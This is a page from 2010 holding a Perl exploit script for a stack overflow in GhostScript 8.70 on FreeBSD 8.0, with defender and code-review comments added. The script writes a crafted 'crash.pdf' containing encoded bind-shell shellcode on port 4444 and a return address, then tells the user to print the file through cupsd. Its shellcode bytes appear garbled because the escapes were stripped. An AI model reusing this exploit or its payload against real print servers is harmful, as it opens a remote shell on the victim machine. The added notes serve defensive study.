
GhostScript PostScript File Stack Overflow Exploit

Posted on 18 July 2010

# ==================================================
# GhostScript PostScript File Stack Overflow Exploit
# ==================================================
#
# Purpose (as shown): builds one long string and writes it to ./crash.pdf.
# The banner strings below name GhostScript 8.70 on FreeBSD 8.0 as the
# affected software, and the closing message names cupsd, so the exposed
# path is a print pipeline that hands submitted jobs to Ghostscript.
#
# NOTE(review): as rendered on this page the string literals contain no
# backslash escapes, so they are plain text here (the page extraction
# appears to have altered them). The listing is documented as shown, not
# corrected.
#
# Defender notes:
#   - Patch: move off the Ghostscript release named in the banner to a
#     fixed one (the page does not state which release carries the fix).
#   - Exposure: limit who may submit print jobs and run print filters with
#     the least privilege the spooler allows.
#   - Detection: the payload header below describes a TCP bind shell with
#     LPORT=4444; a print-filter or gs process that opens a listening
#     socket or spawns a shell is a strong indicator. A document whose
#     header is followed by one unbroken run of hundreds of filler
#     characters is another.

##########################################################################
# Check Point Software Technologies - Vulnerability Discovery Team (VDT) #
# Rodrigo Rubira Branco - <rbranco *noSPAM* checkpoint.com>              #
#                                                                        #
# GhostScript Stack Overflow                                             #
#                                                                        #
##########################################################################

# Author's payload description (generator output header, kept verbatim):
# bsd/x86/shell_bind_tcp - 214 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_upper
# AppendExit=false, PrependSetresuid=false,
# PrependSetuid=false, LPORT=4444, RHOST=,
# PrependSetreuid=false
my $buf =
"x54x5axdaxd1xd9x72xf4x5ax4ax4ax4ax4ax4ax43" .
"x43x43x43x43x43x52x59x56x54x58x33x30x56x58" .
"x34x41x50x30x41x33x48x48x30x41x30x30x41x42" .
"x41x41x42x54x41x41x51x32x41x42x32x42x42x30" .
"x42x42x58x50x38x41x43x4ax4ax49x50x31x49x50" .
"x46x30x45x38x4bx4fx44x42x42x31x51x4cx4dx59" .
"x4bx57x50x50x43x5ax45x51x42x4ax44x42x42x4a" .
"x44x50x4ex50x45x31x48x4dx4bx30x51x47x46x30" .
"x46x30x43x5ax45x38x51x48x48x4dx4bx30x4dx59" .
"x51x57x4ax4cx48x30x43x5ax48x4dx4dx50x4ex50" .
"x45x4ex48x4dx4dx50x50x50x50x50x43x5ax51x4a" .
"x50x58x48x4dx4dx50x4bx4fx50x4fx4ax44x43x49" .
"x4bx46x46x30x42x48x46x4fx46x4fx44x33x42x48" .
"x43x58x46x4fx43x52x45x39x42x4ex4bx39x4bx53" .
"x46x30x46x34x50x53x50x50x48x30x47x4bx48x4d" .
"x4dx50x41x41";

# $pkt is the full file content: a short header, filler, two short literals
# (the first labelled by the author as the shellcode address), more filler,
# then $buf padded on the left with "C" so that padding plus $buf is 1200
# characters, then a trailing run of "Z".
# `x` (repetition) binds tighter than `.`, so each `"..." x N` is repeated
# before it is concatenated.
# NOTE(review): $pkt is assigned without `my`; the script has no
# `use strict` / `use warnings`.
$pkt = "e!PS".
"A" x 500 .
"00001111222233334444555556666777788889999aaa".
"x40xd9xbfxbf". #Shellcode Addr
"bccccddd".
"xefxbexbfxbf". # second short literal; the author does not say what it is for
"ffff".
"xffxbf" x 100 .
"C" x (1200 - length($buf)) .
$buf .
"Z" x 100;

# Banner goes to STDERR; it names the author, the affected Ghostscript
# release and the operating system.
print STDERR "Check Point Vulnerability Discovery Team (VDT) ";
print STDERR "GhostScript 8.70 exploit for FreeBSD 8.0! ";
print STDERR "Rodrigo Rubira Branco (BSDaemon) ";

print STDERR " Creating evil pdf ...";
# Writes $pkt to crash.pdf in the current directory, truncating any
# existing file.
# NOTE(review): bareword handle, two-argument open, and no check of the
# return value of open/print/close, so a failed write goes unreported.
open(F,">crash.pdf");
print F $pkt;
close(F);
print STDERR " d0ne! ";
# This line goes to STDOUT, unlike the status lines above.
print "Now print it via cupsd! ";

# Inj3ct0r.com [2010-07-18]

 
